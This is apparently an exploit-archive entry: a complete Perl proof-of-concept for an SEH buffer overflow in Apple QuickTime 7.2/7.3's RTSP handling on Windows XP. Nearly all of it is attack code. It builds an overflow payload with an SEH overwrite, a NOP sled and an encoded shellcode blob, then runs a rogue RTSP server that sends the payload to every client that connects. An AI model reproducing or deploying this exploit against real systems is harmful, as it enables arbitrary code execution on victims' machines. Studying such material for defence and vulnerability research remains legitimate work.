Apple QuickTime 7.27.3 - RTSP Buffer Overflow (Perl)

# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) <[email protected]>)
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $junk="A"x991;
my $nseh="\xeb\x06\x90\x90";
my $seh="\x4e\x28\x86\x66"; #\x4e\x28\x86\x66
my $nops="\x90"x20;
my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" .
"\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" .
"\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" .
"\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" .
"\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" .
"\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" .
"\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" .
"\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" .
"\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" .
"\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" .
"\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" .
"\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" .
"\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" .
"\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" .
"\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" .
"\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" .
"\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" .
"\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" .
"\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" .
"\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" .
"\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" .
"\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" .
"\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" .
"\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" .
"\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" .
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" .
"\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" .
"\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" .
"\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41";
my $rest="B"x(4096-length($seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;
my $header = "RTSP/1.0 200 OK\r\n".
"CSeq: 1\r\n".
"Date: 0x00 :P\r\n".
"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n".
"Content-Type: $payload\r\n".
"Content-Length: 334\r\n".
"\r\n";
my $body = "v=0\r\n".
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n".
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".
"i=1.mp3\r\n".
"t=0 0\r\n".
"a=tool:ciamciaramcia\r\n".
"a=type:broadcast\r\n".
"a=control:*\r\n".
"a=range:npt=0-213.077\r\n".
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".
"a=x-qt-text-inf:1.mp3\r\n".
"m=audio 0 RTP/AVP 14\r\n".
"c=IN IP4 0.0.0.0\r\n".
"a=control:track1\r\n";
my $evil=$header.$body;
my $port=shift || 554;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+]Listening on [RTSP]554\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print CLIENT $evil;
print "[+]Connection Accepted\n";
print "[+]Sending Evil Payload\n";
}
close CLIENT;
print "[+]Connection closed\n";